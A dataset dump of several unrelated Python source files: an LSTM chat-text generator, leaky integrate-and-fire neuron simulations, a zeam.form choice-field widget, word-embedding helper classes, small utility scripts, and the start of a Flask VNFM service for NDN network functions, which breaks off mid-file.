text
stringlengths 8
6.05M
|
|---|
# CLI setup and hyperparameters for training an LSTM text generator on one
# user's chat log (see train_lstm / text_gen below).
import argparse, glob, sys, json, ast, copy
import random
import tensorflow as tf
from data_provider import generate_data
from lstm_model import LSTM_model
import numpy as np

parser = argparse.ArgumentParser(prog="yikes_lolintator",
                                 description="Send a sample text file to the yikes lolinator")
parser.add_argument('src_path', metavar='path', type=str, help="Path to a specific user's chat dialogue (.txt)")
parser.add_argument('epochs', metavar='num_epochs', type=int, help="Number of epochs to train for")
args = parser.parse_args()

# NOTE(review): files[0] raises IndexError when the glob matches nothing —
# consider validating before indexing.
files = glob.glob(args.src_path)
file_path = files[0]
data = generate_data(file_path)

# Hyperparameters
BATCH_SIZE = 1
SEQUENCE_LENGTH = 3  # number of context words fed to the LSTM
# presumably data[2][0] is a one-hot/vocabulary row, so this is the vocab size
# — TODO confirm against data_provider.generate_data
TARGET_LENGTH = len(data[2][0])
LEARNING_RATE = 0.001
DECAY_RATE = 0.97
HIDDEN_LAYERS = 1000
epochs = args.epochs or 1  # NOTE: an explicit 0 also falls back to 1
tensorboard_dir = "./data_summaries"
def train_lstm(sess):
    """Train the LSTM for `epochs` epochs over every (input, target) pair.

    :param sess: an open tf.Session; variables are (re)initialized here.
    """
    data = generate_data(file_path)
    # Both the input and output layer sizes are the vocabulary size.
    lstm_nn = LSTM_model(len(data[2][0]), BATCH_SIZE, SEQUENCE_LENGTH, TARGET_LENGTH, len(data[2][0]))
    # Sessions created in this scope will run operations from `g_1`.
    summaries = tf.summary.merge_all()
    writer = tf.summary.FileWriter(tensorboard_dir)
    writer.add_graph(sess.graph)
    sess.run(tf.global_variables_initializer())
    #sess.run(lstm_nn.learning_rate)
    inputs, targets = data[0], data[1]
    for j in range(0, epochs):
        for i in range(len(inputs)):
            print("ITERATION: "+str(i)+"/"+str(len(inputs)))
            # BATCH_SIZE is 1: feed a single (sequence, target) pair per step.
            feed = {lstm_nn.inputs: [inputs[i]], lstm_nn.targets: [targets[i]]}
            sess.run(lstm_nn.train_step, feed)
        # NOTE(review): lstm_nn.cost[-1] presumably indexes a loss history
        # kept on the model — confirm against lstm_model.LSTM_model.
        print("EPOCH: " + str(j) + ", Loss = " + str(lstm_nn.cost[-1]))
def text_gen(sess, input, length):
    """Generate and print `length` words of text, seeded with `input`.

    :param sess: tf.Session holding the trained variables
    :param input: list of SEQUENCE_LENGTH seed words
    :param length: number of words to generate
    """
    data = generate_data(file_path)
    # Fix: build the inference-mode model ONCE. The original constructed a
    # new LSTM_model on every loop iteration, growing the TF graph and
    # slowing generation down with each word.
    lstm_nn = LSTM_model(len(data[2][0]), BATCH_SIZE, SEQUENCE_LENGTH, TARGET_LENGTH, len(data[2][0]), training=False)
    # Shift batches based on initial input to continue generating text.
    curr_input = list(input)
    phrase = ""
    for i in range(0, length):
        word = lstm_nn.predict_word(sess, curr_input, data[2])
        phrase += word + " "
        # Generalized sliding window: drop the oldest word, append the new
        # one — works for any SEQUENCE_LENGTH (the original hard-coded 3).
        curr_input = curr_input[1:] + [word]
    print(phrase)
# Train, then seed generation with three consecutive entries of the
# vocabulary table (data[2][1]) starting at a random offset.
sess = tf.Session()
train_lstm(sess)
start_sentence = random.randint(0, TARGET_LENGTH - 4)
text_gen(sess, [data[2][1][start_sentence],
                data[2][1][start_sentence + 1],
                data[2][1][start_sentence + 2]], 300)
|
#! /usr/bin/python3
import sys
import os
sys.path.insert(0, os.path.abspath('../models'))
import numpy as np
import matplotlib.pyplot as plt
import sys
from LIF import *
from spike_train import plot_spike_trains
def I_sin(f):
    """Return a sinusoidal input-current function of frequency *f* (Hz):
    t -> 1 + sin(2*pi*f*t), i.e. a unit-offset sinusoid."""
    return lambda t: 1 + np.sin(2 * np.pi * f * t)
#1
def stimuli_plot():
    """Plot the sinusoidal input current for f = 1, 5, 40 Hz over one second."""
    fig, axs = plt.subplots(3, 1, sharex='col')
    t = np.linspace(0, 1, 10000)
    for i, f in enumerate([1, 5, 40]):
        I = I_sin(f)(t)
        axs[i].plot(t, I)
        axs[i].margins(None, 0.02)
        axs[i].set_title("$f = {}$ Hz".format(f))
        axs[i].title.set_position([.5, 1.03])
    plt.xlabel("time $t$ (s)")
    axs[1].set_ylabel("input current $I$")
    plt.tight_layout()
#2
def sin_current(f, C, spiking, ax=None, xylabel=True):
    """Simulate 1 s of an LIF neuron driven at *f* Hz and plot its potential.

    :param f: input-current frequency (Hz)
    :param C: membrane capacitance passed through to LIF
    :param spiking: passed to LIF — presumably enables threshold/reset; confirm in models/LIF
    :param ax: axes to draw on (a fresh figure is created when None)
    :param xylabel: forwarded to LIF.plot_V
    """
    if ax is None:
        fig, ax = plt.subplots()
    # recall that tau_m = R * C * 1e-3 (s)
    neuron = LIF(I_sin(f), spiking, delta_t=0.1, EL=0, Vth=1, R=1, C=C)
    neuron.computeV(1)
    neuron.plot_V(ax, xylabel=xylabel, unit=False)
#3, 4
def sin_current_spikes(C):
    """Membrane-potential traces with spiking enabled for f = 1, 5, 40 Hz."""
    fig, axs = plt.subplots(3, 1, sharex='col')
    for i, f in enumerate([1, 5, 40]):
        sin_current(f, C, True, axs[i], xylabel=False)
        axs[i].set_title("$f = {}$ Hz".format(f))
        axs[i].title.set_position([.5, 1.03])
    plt.xlabel("time $t$ (s)")
    axs[1].set_ylabel("membrane potential $V$")
    plt.tight_layout(h_pad=-0.2)
#5
def tunning_curve_sin(fs, duration=25):
    """Plot the firing rate against the input-current frequency.

    :param fs: sequence of input frequencies (Hz)
    :param duration: simulated time per frequency (s). The firing rate is
        the spike count divided by this window. Defaults to 25 s, the
        value previously hard-coded.
    """
    num_spikes = []
    for f in fs:
        neuron = LIF(I_sin(f), delta_t=0.1, EL=0, Vth=1, R=1, C=100)
        neuron.computeV(duration)
        num_spikes.append(len(neuron.spike_moments) / duration)
    plt.plot(fs, num_spikes)
    plt.xlim(fs[0] - 0.01, fs[-1] + 0.01)
    plt.xlabel("input current frequency $f$ (Hz)")
    plt.ylabel("firing rate $f_{firing}$ (Hz)")
#6
def sin_trains():
    """Raster plot of spike trains over 2 s for several input frequencies."""
    fig, ax = plt.subplots(figsize=(10,3))
    spike_trains = []
    for f in [1, 2, 5, 10, 20, 40, 100]:
        neuron = LIF(I_sin(f), delta_t=0.1, EL=0, Vth=1, R=1, C=100)
        neuron.computeV(2)
        spike_trains.append(neuron.spike_moments)
    plot_spike_trains(spike_trains, (-0.001, 2.001), ax, 1.3)
    ax.invert_yaxis()
# t in s, the larger is t, the better is the precision
def compute_frequency_spectrum(f, t_max):
    """Return |FFT| of the smoothed spike train of a neuron driven at f Hz.

    Spikes are binned on a 10 kHz grid over t_max seconds, smoothed by
    convolution with a 3500-sample Hanning window, then Fourier-transformed.

    :param f: input-current frequency (Hz)
    :param t_max: simulated duration (s); longer runs give finer bins (1/t_max Hz)
    :return: magnitude spectrum covering 0..10000 Hz
    """
    spikes = np.zeros(t_max*10000+1)
    neuron = LIF(I_sin(f), delta_t=0.1, EL=0, Vth=1, R=1, C=100)
    neuron.computeV(t_max)
    for spike_t in neuron.spike_moments:
        spikes[int(spike_t * 10000)] = 1
    # 3500 samples at 10 kHz ~ 0.35 s smoothing kernel
    spike_counts = np.convolve(spikes, np.hanning(3500), 'same')
    # this represents frequency from 0 to 10000 Hz
    return np.abs(np.fft.fft(spike_counts))
#7
def plot_frequency_spectrum(f, t_max):
    """Plot the 0-50 Hz band of the response spectrum for input frequency f,
    and print the dominant non-DC component (in Hz)."""
    fs = compute_frequency_spectrum(f, t_max)
    # Bin width is 1/t_max Hz, so t_max*50 bins span 0..50 Hz.
    plt.plot(np.linspace(0, 50, t_max*50+1), fs[:t_max*50+1])
    # Strongest bin in 0..5000 Hz, skipping the DC bin, converted to Hz.
    print((np.argmax(fs[1:t_max*5000+1])+1)/t_max)
    plt.xlabel("frequency (Hz)")
    plt.ylabel("amplitude")
#8
def tunning_curve_sin2(fs, t_max):
    """Plot the dominant response frequency against the input frequency."""
    lowest_f_comp = []
    for f in fs:
        response_fs = compute_frequency_spectrum(f, t_max)
        # strongest non-DC bin, converted from bin index to Hz
        lowest_f_comp.append((np.argmax(response_fs[1:t_max*5000+1])+1)/t_max)
    plt.plot(fs, lowest_f_comp)
    plt.xlim(fs[0]-0.01, fs[-1]+0.01)
    plt.xlabel("input current frequency $f$ (Hz)")
    plt.ylabel("frequency of the neuronal response $f_r$ (Hz)")
#9
def tunning_curve_sin3(fs):
    """Plot the time of the first spike against the input frequency.

    :param fs: sequence of input frequencies (Hz)
    """
    fts = []
    for f in fs:
        neuron = LIF(I_sin(f), delta_t=0.1, EL=0, Vth=1, R=1, C=100)
        neuron.computeV(1)
        # Robustness fix: a neuron that never fires within 1 s used to raise
        # IndexError on spike_moments[0]; record NaN instead (matplotlib
        # simply skips NaN points).
        fts.append(neuron.spike_moments[0] if len(neuron.spike_moments) > 0 else np.nan)
    plt.plot(fs, fts)
    plt.xlim(fs[0]-0.01, fs[-1]+0.01)
    plt.xlabel("input current frequency $f$ (Hz)")
    plt.ylabel("first spike moment (s)")
# Map CLI argument 1..9 to the corresponding figure-producing function.
cmd_functions = (
    [ stimuli_plot,
      lambda : sin_current(1, 100, False),
      lambda : sin_current_spikes(100),
      lambda : sin_current_spikes(10),
      lambda : tunning_curve_sin(np.linspace(1, 40, 400)),
      sin_trains,
      lambda : plot_frequency_spectrum(20, 20),
      lambda : tunning_curve_sin2(np.linspace(1, 40, 400), 10),
      lambda : tunning_curve_sin3(np.linspace(1, 40, 400)) ])

if __name__ == "__main__":
    # Usage: script N -> draw figure N and save it as ../../figures/LIFSinN
    n = int(sys.argv[1])
    cmd_functions[n-1]()
    plt.savefig("../../figures/LIFSin{}".format(n))
    plt.show()
|
# Interactive demo: compare a user-supplied number n against x = 17.
import time
x=17
n=int(input("Please enter the number you want to subtract with 17 :"))
if n>x:
    # NOTE(review): -(n-x) is the NEGATIVE of the absolute difference even
    # though the message below says "absolute diff"; the printed result is
    # therefore -2*(n-x). Confirm whether `absol_diff = n - x` was intended.
    absol_diff = -(n-x)
    result=2*(absol_diff)
    print("As",n,"is greater than",x,",calculating double to absolute diff ...")
    time.sleep(1)
    print("Result is :",result)
else:
    # NOTE(review): n == x also lands here but is reported as "smaller".
    print("As", n, "is smaller than", x, ",calculating the diff ...")
    result=n-x
    time.sleep(1)
    print(result)
|
from .user import users
from .contact import contacts
|
# -*- coding: utf-8 -*-
from zeam.form.base.markers import NO_VALUE, Marker
from zeam.form.base.widgets import FieldWidget
from zeam.form.base.widgets import WidgetExtractor
from zeam.form.ztk.fields import Field, registerSchemaField
from zeam.form.ztk.interfaces import IFormSourceBinder
from grokcore import component as grok
from zope import component
from zope.i18nmessageid import MessageFactory
from zope.interface import Interface
from zope.schema import interfaces as schema_interfaces
from zope.schema.interfaces import IContextSourceBinder
from zope.schema.interfaces import IVocabularyTokenized, IVocabularyFactory
_ = MessageFactory("zeam.form.base")
class ChoiceField(Field):
    """A choice field.

    The selectable values come either from a zope source/vocabulary given
    directly, or from a named IVocabularyFactory utility resolved lazily.
    """
    _source = None              # IVocabularyTokenized given directly, if any
    _vocabularyFactory = None   # factory object (resolved or assigned)
    _vocabularyName = None      # utility name to resolve on first access

    def __init__(self, title,
                 source=None,
                 vocabularyName=None,
                 **options):
        super(ChoiceField, self).__init__(title, **options)
        if source is not None:
            self.source = source
        elif vocabularyName is not None:
            self.vocabularyFactory = vocabularyName

    @property
    def vocabularyFactory(self):
        # Lazily resolve the named utility and cache the result.
        if self._vocabularyFactory is None:
            if self._vocabularyName is not None:
                self._vocabularyFactory = component.getUtility(
                    schema_interfaces.IVocabularyFactory,
                    name=self._vocabularyName)
        return self._vocabularyFactory

    @vocabularyFactory.setter
    def vocabularyFactory(self, factory):
        # A string is treated as a utility name to look up later.
        if isinstance(factory, str):
            self._vocabularyName = factory
            self._vocabularyFactory = None
        else:
            self._vocabularyName = None
            self._vocabularyFactory = factory
        self._source = None

    @property
    def source(self):
        return self._source

    @source.setter
    def source(self, source):
        # Verify if this is a source or a vocabulary
        if IVocabularyTokenized.providedBy(source):
            self._source = source
        else:
            # Be sure to reset the source
            self._source = None
            self._vocabularyFactory = source

    def getChoices(self, form):
        """Return the tokenized vocabulary for `form`, binding context/form
        source binders as appropriate."""
        source = self.source
        if source is None:
            factory = self.vocabularyFactory
            assert factory is not None, \
                "No vocabulary source available."
            if (IContextSourceBinder.providedBy(factory) or
                    IVocabularyFactory.providedBy(factory)):
                source = factory(form.context)
            elif IFormSourceBinder.providedBy(factory):
                source = factory(form)
            assert IVocabularyTokenized.providedBy(source), \
                "No valid vocabulary available, %s is not valid for %s" % (
                    source, self)
        return source

    def validate(self, value, form):
        """Run base validation, then require the value to be a valid choice."""
        error = super(ChoiceField, self).validate(value, form)
        if error is not None:
            return error
        if not isinstance(value, Marker):
            choices = self.getChoices(form)
            if value not in choices:
                return _(u"The selected value is not among the possible choices.")
        return None

# BBB
ChoiceSchemaField = ChoiceField
class ChoiceFieldWidget(FieldWidget):
    """Widget rendering a ChoiceField (select-style input)."""
    grok.adapts(ChoiceField, Interface, Interface)
    defaultHtmlClass = ['field', 'field-choice', 'form-control']
    defaultHtmlAttributes = set(['required', 'size', 'style', 'disabled'])
    _choices = None  # per-widget cache of the bound vocabulary

    def __init__(self, field, form, request):
        super(ChoiceFieldWidget, self).__init__(field, form, request)
        self.source = field

    def lookupTerm(self, value):
        """Return the vocabulary term for `value`, falling back to the
        field's default when the stored value is no longer a valid choice."""
        choices = self.choices()
        try:
            return choices.getTerm(value)
        except LookupError:
            # the stored value is invalid. fallback on the default one.
            default = self.component.getDefaultValue(self.form)
            if default is not NO_VALUE:
                return choices.getTerm(default)
        return None

    def valueToUnicode(self, value):
        """Serialize `value` to its vocabulary token (u'' when unknown)."""
        term = self.lookupTerm(value)
        if term is not None:
            return term.token
        return u''

    def choices(self):
        """Return (and cache) the field's vocabulary bound to this form."""
        if self._choices is not None:
            return self._choices
        # self.source is used instead of self.component in order to be
        # able to override it in subclasses.
        self._choices = self.source.getChoices(self.form)
        return self._choices
class ChoiceDisplayWidget(ChoiceFieldWidget):
    """Read-only rendering of a choice: shows the term title, not its token."""
    grok.name('display')

    def valueToUnicode(self, value):
        """Return the display title of `value`'s term, or u'' when unknown."""
        term = self.lookupTerm(value)
        return u'' if term is None else term.title
class ChoiceWidgetExtractor(WidgetExtractor):
    """Extractor converting a submitted token back into its vocabulary value."""
    grok.adapts(ChoiceField, Interface, Interface)

    def extract(self):
        value, error = super(ChoiceWidgetExtractor, self).extract()
        if value is not NO_VALUE:
            choices = self.component.getChoices(self.form)
            try:
                value = choices.getTermByToken(value).value
            except LookupError:
                # Token not in the vocabulary: reject the submission.
                return (None, u'Invalid value')
        return (value, error)
# Radio Widget
class RadioFieldWidget(ChoiceFieldWidget):
    """Widget rendering a ChoiceField as a list of radio buttons."""
    grok.adapts(ChoiceField, Interface, Interface)
    grok.name('radio')

    def renderableChoices(self):
        """Yield one render dict (token/title/checked/id) per choice."""
        current = self.inputValue()
        base_id = self.htmlId()
        for i, choice in enumerate(self.choices()):
            yield {'token': choice.token,
                   'title': choice.title or choice.token,
                   'checked': choice.token == current and 'checked' or None,
                   'id': base_id + '-' + str(i)}
def ChoiceSchemaFactory(schema):
    """Build a ChoiceField from a zope.schema IChoice field definition."""
    field = ChoiceField(
        schema.title or None,
        identifier=schema.__name__,
        description=schema.description,
        required=schema.required,
        readonly=schema.readonly,
        source=schema.vocabulary,
        vocabularyName=schema.vocabularyName,
        interface=schema.interface,
        constrainValue=schema.constraint,
        defaultFactory=schema.defaultFactory,
        # NOTE(review): `or NO_VALUE` collapses falsy defaults (0, u'',
        # False) to NO_VALUE — confirm this is intended.
        defaultValue=schema.__dict__['default'] or NO_VALUE)
    return field
def register():
    """Register ChoiceSchemaFactory as the factory for IChoice schema fields."""
    registerSchemaField(ChoiceSchemaFactory, schema_interfaces.IChoice)
|
import logging
import os
import sys
import time
from functools import wraps

def time_logger(func):
    """
    Decorator that logs the start and end time of each call to *func*.

    Timings are appended to ./logs/timings.log; the directory is created
    on first use. The program exits if the directory cannot be created.

    :param func: the function to wrap
    :return: the wrapped function (metadata preserved via functools.wraps)
    """
    logger = logging.getLogger(__name__)
    logger.setLevel(logging.INFO)
    # Bug fix: the original only attached the FileHandler inside the
    # FileExistsError branch, so on the very first run (directory freshly
    # created) nothing was ever written to the log file.
    try:
        os.makedirs("./logs", exist_ok=True)
    except OSError as e:
        print(f"Unable to create logs folder ({e}). Quitting..")
        sys.exit(1)
    # Guard against stacking duplicate handlers when several functions are
    # decorated (which would duplicate every log line).
    if not logger.handlers:
        logger.addHandler(logging.FileHandler('./logs/timings.log'))

    # wrapper that writes function start and end timings to the log file
    @wraps(func)
    def wrapper_timer(*args, **kwargs):
        logger.info(f"Function {func.__name__} started at {time.asctime()}")
        value = func(*args, **kwargs)
        logger.info(f"Function {func.__name__} ended at {time.asctime()}")
        return value
    return wrapper_timer
|
import random

# CardDraw: draw one random card from either a standard or a tarot deck.
print("Welcome to CardDraw")
deck = input("Please enter (s)tandard or (t)arot:")
# Bug fix: the original re-prompted ONCE on invalid input and then threw
# the answer away without drawing anything. Keep prompting until valid.
while deck.lower() not in ("s", "t"):
    deck = input("Please enter (s)tandard or (t)arot:")
if deck.lower() == "s":
    # Standard 52-card deck: uniform over rank x suit.
    suits = ["Spades", "Hearts", "Clubs", "Diamonds"]
    ranks = ["Ace", "2", "3", "4", "5", "6", "7", "8", "9", "10", "Jack", "Queen", "King"]
    my_suit = random.choice(suits)
    my_rank = random.choice(ranks)
    my_draw = (my_rank+" of "+my_suit)
    print(my_draw)
else:
    # Tarot: 56 minor arcana (14 ranks x 4 suits) + 22 major arcana = 78.
    suits = ["Wands", "Cups", "Swords", "Coins"]
    ranks = ["Ace", "2", "3", "4", "5", "6", "7", "8", "9", "10", "Page", "Knight", "Queen", "King"]
    # "Strenght" kept verbatim from the original card list (sic).
    majors = ["The Fool", "The Magician", "The High Priestess", "The Empress", "The Emperor", "The Hierophant", "The Lovers", "The Chariot", "Justice", "The Hermit", "The Wheel of Fortune", "Strenght", "The Hanged Man", "Death", "Temperance", "The Devil", "The Tower", "The Star", "The Moon", "The Sun", "Judgement", "The World"]
    randint = random.randint(1,78)
    if randint >= 23:
        # 56/78 chance: minor arcana
        my_suit = random.choice(suits)
        my_rank = random.choice(ranks)
        my_draw = (my_rank+" of "+my_suit)
        print(my_draw)
    else:
        # 22/78 chance: major arcana
        my_draw = random.choice(majors)
        print(my_draw)
|
from gensim.models import KeyedVectors as Word2Vec
import numpy as np
from embeddings import embedding_utils
from utils import file_utils
import os, re
import logging
DEBUG = False
class Model_Constants(object):
    """String identifiers for the supported embedding backends."""

    word2vec = "word2vec"
    char2vec = "char2vec"
    private_word2vec = "private_word2vec"
    elmo = "elmo"
class Embedding_Model(object):
    """One embedding backend (word2vec / char2vec / private word2vec / elmo)
    with unknown-word handling delegated to an optional character model."""

    def __init__(self, name, vector_dim):
        # `name` must be one of the Model_Constants values.
        self.name = name
        self.model = None        # backing model; populated by load_model()
        self.char_model = None   # Embedding_Model used for OOV words (set_char_model)
        self.vocabs_list = None  # vocabulary list for the private w2v model
        self.vector_dim = vector_dim  # expected output dimensionality
        # TODO: update this changeable param later
        # unk, random, mean, replace_by_character_embedding
        self.unknown_word = "replace_by_character_embedding"
        # self.MAX_DIM = 400 # No longer use MAX_DIM, now it depends on input dims

    def load_model(self, model_path):
        """Load the backend named by self.name from `model_path`.

        word2vec/elmo: gensim word2vec format (.bin => binary).
        char2vec: whitespace-separated text file of char + vector per line.
        private_word2vec: pickled embeddings via embedding_utils.
        :raises Exception: for an unrecognized model name.
        """
        if self.name == Model_Constants.word2vec or self.name == Model_Constants.elmo:
            if model_path.endswith(".bin"):
                self.model = Word2Vec.load_word2vec_format(model_path, binary=True)
            else:
                self.model = Word2Vec.load_word2vec_format(model_path, binary=False)
        elif self.name == Model_Constants.char2vec:
            self.model = dict()
            print("Loading model_path = ", model_path)
            file = open(model_path, "r")
            for line in file:
                elements = line.split()
                # Lines shorter than ~100 tokens are headers/garbage, not vectors.
                if len(elements) > 100:  # because embedding dim is higher than 100.
                    self.model[elements[0]] = np.array([float(i) for i in elements[1:]]).tolist()
            return self.model
        elif self.name == Model_Constants.private_word2vec:
            self.model, _, self.vocabs_list = embedding_utils.reload_embeddings(model_path)
        else:
            raise Exception("Unknown embedding models!")

    def is_punct(self, word):
        """Return True when `word` is one of a fixed list of punctuation tokens."""
        arr_list = [
            '!',
            '"',
            '%',
            '&',
            "'",
            "''",
            '(',
            '(.',
            ')',
            '*',
            '+',
            ',',
            '-',
            '---',
            '.',
            '..',
            '...',
            '....',
            '/',
        ]
        if word in arr_list:
            return True
        else:
            return False

    def is_number(self, word):
        """Return True when `word` starts with a digit (per-line, MULTILINE)."""
        regex = r"^[0-9]+"
        matches = re.finditer(regex, word, re.MULTILINE)
        matchNum = 0
        for matchNum, match in enumerate(matches):
            matchNum = matchNum + 1
        if matchNum > 0:
            return True
        else:
            return False

    def set_char_model(self, char_model):
        # Attach the character model used to embed unknown words.
        self.char_model = char_model

    def load_vocabs_list(self, vocab_file_path):
        """
        Load vocabs list for private w2v model. Has to be pickle file.
        :param vocab_file_path:
        :return:
        """
        if vocab_file_path:
            self.vocabs_list = file_utils.load_obj(vocab_file_path)

    def get_char_vector(self, char_model, word):
        """
        char_model here is an instance of embedding_model
        :param char_model: an instance of embedding_model
        :param word:
        :return: mean of the word's known character vectors, or [] when no
            character of the word is present in the char model
        :raises Exception: when char_model is None
        """
        if char_model is None:
            # Sonvx on March 20, 2019: we now allow the char_model is None,
            # cannot call this get_char_vector in such case.
            raise Exception("Char_model is None! Cannot use character-embedding.")
        out_char_2_vec = []
        char_vecs = []
        chars = list(word)
        vecs = []
        for c in chars:
            if c in char_model.model:
                emb_vector = char_model.model[c]
                vecs.append(emb_vector)
                if DEBUG:
                    input(">>>>>>")
                    print("Char_emb_vector=", emb_vector)
        if len(vecs) > 0:
            out_char_2_vec = np.mean(vecs, axis=0)
        if DEBUG:
            print(">>> Output of char2vec: %s"%(out_char_2_vec))
            input(">>>> outc2v ...")
        return out_char_2_vec

    def is_unknown_word(self, word):
        """Check whether or not a word is unknown"""
        is_unknown_word = False
        if self.vocabs_list is not None:
            # private w2v: membership is defined by the vocab list
            if word not in self.vocabs_list:
                is_unknown_word = True
        else:
            # otherwise ask the backing model directly
            if word not in self.model:
                is_unknown_word = True
        return is_unknown_word

    def get_word_vector(self, word):
        """
        Handle unknown word: In case of our private word2vec, we have a vocabs_list to check. With regular models,
        we can check inside the model. Note that by default, we use char-model to handle unknown words.
        The returned vector is always exactly self.vector_dim long: longer
        vectors are trimmed, shorter ones are zero-padded.
        :param word:
        :return: numpy array / list of length self.vector_dim
        """
        rtn_vector = []
        # try first time with normal case
        is_unknown_word = self.is_unknown_word(word)
        # try 2nd times with lowercase.
        if is_unknown_word:
            word = word.lower()
            is_unknown_word = self.is_unknown_word(word)
        # unknown word
        if is_unknown_word and self.char_model:
            # Sonvx on March 20, 2019: solve unknown only when char_model is SET.
            rtn_vector = self.get_vector_of_unknown(word)
        else:
            # normal case
            if self.name == Model_Constants.word2vec:
                rtn_vector = self.model[word]
                # For now we have self.vector_dim, max_dim, and len(rtn_vector)
                # Update: move to use self.vector_dim only
                if len(rtn_vector) > self.vector_dim:
                    print("Warning: auto trim to %s/%s dimensions"%(self.vector_dim, len(rtn_vector)))
                    rtn_vector = self.model[word][:self.vector_dim]
            elif self.name == Model_Constants.elmo:
                rtn_vector = self.model[word]
                # An elmo vector of exactly twice the expected size is folded
                # by averaging its two halves element-wise.
                if self.vector_dim == len(rtn_vector)/2:
                    vector1 = rtn_vector[:self.vector_dim]
                    vector2 = rtn_vector[self.vector_dim:]
                    print("Notice: auto average to b[i] = (a[i] + a[i + %s])/2 /%s dimensions" % (self.vector_dim,
                                                                                                 len(rtn_vector)))
                    rtn_vector = np.mean([vector1, vector2], 0)
                elif len(rtn_vector) > self.vector_dim:
                    print("Warning: auto trim to %s/%s dimensions" % (self.vector_dim, len(rtn_vector)))
                    rtn_vector = self.model[word][:self.vector_dim]
            elif self.name == Model_Constants.char2vec:
                # This model IS the char model, so pass self as char_model.
                rtn_vector = self.get_char_vector(self, word)
            elif self.name == Model_Constants.private_word2vec:
                # Handle unknown word - Not need for now since we handle unknown words first
                if word not in self.vocabs_list:
                    word = "UNK"
                word_idx = self.vocabs_list.index(word)
                emb_vector = self.model[word_idx]
                rtn_vector = emb_vector
        # final check before returning vector
        if DEBUG:
            print(">>> DEBUG: len(rtn_vector) = %s" % (len(rtn_vector)))
            input(">>> before returning vector ...")
        if len(rtn_vector) < 1:
            # Nothing found at all: all-zeros placeholder of the right size.
            return np.zeros(self.vector_dim)
        else:
            if len(rtn_vector) == self.vector_dim:
                return rtn_vector
            # TODO: find a better way to represent unknown word by character to have same-size with word-vector-size
            # For now, I add 0 to the [current-len, expected-len]
            else:
                logging.debug("Model name = %s, Current word = %s, Current size = %s, expected size = %s"
                              %(self.name, word, len(rtn_vector), self.vector_dim))
                return np.append(rtn_vector, np.zeros(self.vector_dim - len(rtn_vector)))

    def get_vector_of_unknown(self, word):
        """
        If word is UNK, use char_vector model instead.
        :param word:
        :return: embedding vector (possibly trimmed to self.vector_dim),
            or None when the word2vec branch produces nothing
        """
        # Here we handle features based on the w2v model where
        # numbers and punctuations are encoded as <punct>, <number>
        if self.name == Model_Constants.word2vec:
            if self.is_number(word):
                rtn_vector = self.model["<number>"]
            elif self.is_punct(word):
                rtn_vector = self.model["<punct>"]
            else:
                rtn_vector = self.get_char_vector(self.char_model, word)
            if rtn_vector is not None:
                if len(rtn_vector) > self.vector_dim:
                    print("Warning: auto trim to %s/%s dimensions"%(self.vector_dim, len(rtn_vector)))
                    return rtn_vector[:self.vector_dim]
                else:
                    return rtn_vector
        # otherwise, using c2v to build-up the embedding vector
        else:
            return self.get_char_vector(self.char_model, word)
class Embedding_Models(object):
    """
    Using all available embedding models to generate vectors
    """
    def __init__(self, list_models):
        # list of Embedding_Model objects, e.g. for
        # ['word2vec', 'char2vec', 'private_word2vec']
        self.list_models = list_models

    def add_model(self, emb_model, char_model):
        """
        Add new model into the collection of embedding models. Note that, every model has to add char_model to handle
        unknown word.
        :param emb_model: Embedding_Model instance to register
        :param char_model: character model for OOV words (may be None)
        :raises Exception: when emb_model is not an Embedding_Model
        :return:
        """
        if char_model is None:
            print("Warning: char_model is None -> cannot solve OOV word. Keep going ...")
            # Sonvx on March 20, 2019: change to allow None char_model
            # raise Exception("char_model cannot be None.")
        if isinstance(emb_model, Embedding_Model):
            emb_model.set_char_model(char_model)
            self.list_models.append(emb_model)
        else:
            raise Exception("Not an instance of embedding_model class.")

    def get_vector_of_document(self, document):
        """
        Get all embedding vectors for one document: each word's vectors from
        every registered model are concatenated, then averaged over words.
        :param document: iterable of words
        :return: 1-D numpy array (mean of the per-word concatenations)
        """
        doc_vector = []
        for word in document:
            all_vectors_of_word = []
            # get all embedding vectors of a word
            for emb_model in self.list_models:
                emb_vector = emb_model.get_word_vector(word)
                all_vectors_of_word.extend(emb_vector)
            # stack a combined vector of all words
            doc_vector.append(all_vectors_of_word)
        # get the mean of them to represent a document
        doc_vector = np.mean(doc_vector, axis=0)
        return doc_vector

    def get_word_vector_of_multi_embeddings(self, word):
        """
        Concatenate `word`'s vectors from all registered models.
        :param word:
        :return: flat list of floats
        """
        word_vector = []
        for emb_model in self.list_models:
            emb_vector = emb_model.get_word_vector(word)
            word_vector.extend(emb_vector)
        return word_vector
|
# VNFM service: two Flask apps bridging the NDN VNFs (front, overlay net)
# and the NFVO (back, bridge net).
# NOTE(review): this module is Python 2 (see `print data` in mmt_report).
from werkzeug.serving import run_simple
from flask import Flask,json,request,Response
from nfd_vnfm import NFD_VNFM
import sys
from threading import Thread
import time
import copy
import logging
from logging.handlers import RotatingFileHandler

# Log everything (DEBUG) to a 1 MB rotating file (1 backup) and to stderr.
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s :: %(levelname)s :: %(message)s')
file_handler = RotatingFileHandler('activity.log', 'a', 1000000, 1)
file_handler.setLevel(logging.DEBUG)
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
stream_handler = logging.StreamHandler()
stream_handler.setLevel(logging.DEBUG)
logger.addHandler(stream_handler)
#TODO: get vnfm_overlay_ip by docker, not by bash
#import docker
#client = docker.from_env()
import pdb
# WSGI Application
front_app = Flask('front_app')  # VNFM <--> VNFs
back_app = Flask('back_app')    # VNFM <--> NFVO
#launch NDN vnfm
# Positional CLI arguments; no validation (IndexError when missing).
nfvo_host = sys.argv[1]
nfvo_port = sys.argv[2]
vnfm_bridge_ip = sys.argv[3]
vnfm_overlay_ip = sys.argv[4]
vnfm_port = sys.argv[5]
vnfm = NFD_VNFM(nfvo_host, nfvo_port, logger)
logger.debug('VNFM is UP!')
id_list=list()
id_list.append("EmptyList")
#TODO: all functions with threads to minimise request waiting
# "UP" notifications from egress gateways, ingress gateways and routers.
# Each HTTP handler parses the sender's info and hands the join off to a
# worker thread so the HTTP ACK can return immediately.
def vnfm_handle_egressGatewayJoin(container, interface, port):
    # Thread target: register the egress gateway with the VNFM.
    vnfm.handle_RouterJoin(container, interface, port)

@front_app.route('/eGW/notifications/eGW_UP', methods=['POST'])
def handle_eGW_up():
    logger.debug("eGW UP notification received")
    router_infos = json.loads(request.data)
    container = router_infos[u'container']
    interface = router_infos[u'listening_interface']
    port = router_infos[u'listening_port']
    Thread(target=vnfm_handle_egressGatewayJoin, args=[container, interface, port]).start()
    logger.debug("sending ACK for eGW")
